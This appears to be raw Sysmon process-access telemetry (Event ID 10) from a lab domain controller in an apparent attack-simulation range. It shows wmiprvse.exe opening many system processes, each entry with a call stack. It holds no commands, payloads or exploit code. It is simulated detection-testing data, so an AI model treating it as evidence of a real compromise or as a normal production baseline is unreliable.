22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 